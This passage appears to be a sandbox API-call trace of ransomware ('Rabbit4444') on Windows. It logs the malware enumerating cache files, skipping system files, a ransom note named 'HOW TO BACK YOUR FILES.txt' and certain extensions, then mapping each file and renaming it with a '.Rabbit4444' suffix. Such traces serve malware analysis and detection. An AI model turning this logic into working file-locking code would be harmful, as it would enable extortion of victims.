(lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2="ids.txt") returned -1 [0069.563] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.563] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt" [0069.563] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt", dwFileAttributes=0x2000) returned 1 [0069.564] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt") returned 85 [0069.564] lstrlenW (lpString="Rabbit4444") returned 10 [0069.564] lstrcmpiW (lpString1="_19[1].txt", lpString2="Rabbit4444") returned -1 [0069.564] lstrlenW (lpString=".dll") returned 4 [0069.564] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.564] lstrlenW (lpString=".lnk") returned 4 [0069.564] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.564] lstrlenW (lpString=".ini") returned 4 [0069.564] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.564] lstrlenW (lpString=".sys") returned 4 [0069.564] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.564] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_19[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.564] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.564] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16087507481) returned 1 [0069.564] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=126777) returned 1 [0069.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0069.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0069.565] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1f240, lpName=0x0) returned 0x29c [0069.684] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1f240) returned 0x70000 [0069.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0069.690] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0069.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.690] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0069.690] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0069.691] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16100131600) returned 1 [0069.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0069.691] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0069.691] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.692] CloseHandle (hObject=0x29c) returned 1 [0069.692] CloseHandle (hObject=0x280) returned 1 [0069.692] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt.Rabbit4444") returned 198 [0069.692] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_19[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_19[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.693] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf9125365, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf9125365, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd067ccf2, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x6426, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", cAlternateFileName="C_1F20~1.TXT")) returned 1 [0069.693] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.693] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.693] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.694] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2=".") returned 1 [0069.694] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2="..") returned 1 [0069.694] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2="windows") returned -1 [0069.694] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2="bootmgr") returned 1 [0069.694] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2="pagefile.sys") returned -1 [0069.694] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2="boot") returned 1 [0069.694] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2="ids.txt") returned -1 [0069.694] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.694] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt" [0069.694] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt", dwFileAttributes=0x2000) returned 1 [0069.694] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt") returned 85 [0069.694] lstrlenW (lpString="Rabbit4444") returned 10 [0069.694] lstrcmpiW (lpString1="_20[1].txt", lpString2="Rabbit4444") returned -1 [0069.694] lstrlenW (lpString=".dll") returned 4 [0069.694] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.694] lstrlenW (lpString=".lnk") returned 4 [0069.694] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.694] lstrlenW (lpString=".ini") returned 4 [0069.694] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.694] lstrlenW (lpString=".sys") returned 4 [0069.694] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.694] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_20[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.695] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.695] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16100579297) returned 1 [0069.695] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=25638) returned 1 [0069.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0069.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0069.695] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6730, lpName=0x0) returned 0x29c [0069.696] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6730) returned 0x70000 [0069.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0069.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0069.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0069.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0069.701] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16101256987) returned 1 [0069.702] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0069.702] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0069.702] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.702] CloseHandle (hObject=0x29c) returned 1 [0069.702] CloseHandle (hObject=0x280) returned 1 [0069.702] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt.Rabbit4444") returned 198 [0069.702] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_20[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_20[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.703] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8cacc5f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8cacc5f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd067ccf2, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xb12f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", cAlternateFileName="C__WIN~1.TXT")) returned 1 [0069.703] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.703] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.703] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.703] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2=".") returned 1 [0069.703] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2="..") returned 1 [0069.703] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2="windows") returned -1 [0069.704] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2="bootmgr") returned 1 [0069.704] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2="pagefile.sys") returned -1 [0069.704] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2="boot") returned 1 [0069.704] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2="ids.txt") returned -1 [0069.704] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.704] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt" [0069.704] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt", dwFileAttributes=0x2000) returned 1 [0069.704] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt") returned 84 [0069.704] lstrlenW (lpString="Rabbit4444") returned 10 [0069.704] lstrcmpiW (lpString1="p_2[1].txt", lpString2="Rabbit4444") returned -1 [0069.704] lstrlenW (lpString=".dll") returned 4 [0069.704] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.704] lstrlenW (lpString=".lnk") returned 4 [0069.704] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.704] lstrlenW (lpString=".ini") returned 4 [0069.704] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.705] lstrlenW (lpString=".sys") returned 4 [0069.705] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.705] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_2[1].txt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0069.705] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0069.705] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16101578162) returned 1 [0069.705] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=45359) returned 1 [0069.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0069.705] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0069.705] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb430, lpName=0x0) returned 0x29c [0069.706] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb430) returned 0x70000 [0069.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0069.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0069.709] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0069.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0069.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0069.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0069.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0069.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0069.710] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16102055192) returned 1 [0069.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0069.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0069.710] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.710] CloseHandle (hObject=0x29c) returned 1 [0069.710] CloseHandle (hObject=0x280) returned 1 [0069.711] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt.Rabbit4444") returned 197 [0069.711] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_2[1].txt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_desktop_2[1].txt.rabbit4444"), dwFlags=0x1) returned 1 [0069.711] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8cacc5f, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xf8cacc5f, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd067ccf2, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xc0f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", cAlternateFileName="C__WIN~2.TXT")) returned 1 [0069.711] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0069.711] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0069.711] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2="Rabbit4444.exe") returned -1 [0069.711] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2=".") returned 1 [0069.711] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2="..") returned 1 [0069.712] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2="windows") returned -1 [0069.712] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2="bootmgr") returned 1 [0069.712] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2="pagefile.sys") returned -1 [0069.712] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2="boot") returned 1 [0069.712] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2="ids.txt") returned -1 [0069.712] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", lpString2="NTUSER.DAT") returned -1 [0069.712] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt" [0069.712] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt", dwFileAttributes=0x2000) returned 1 [0069.712] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt") returned 84 [0069.712] lstrlenW (lpString="Rabbit4444") returned 10 [0069.712] lstrcmpiW (lpString1="p_3[1].txt", lpString2="Rabbit4444") returned -1 [0069.712] lstrlenW (lpString=".dll") returned 4 [0069.712] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0069.712] lstrlenW (lpString=".lnk") returned 4 [0069.712] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0069.712] lstrlenW (lpString=".ini") returned 4 [0069.712] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0069.712] lstrlenW (lpString=".sys") returned 4 [0069.712] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0069.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt" (normalized: 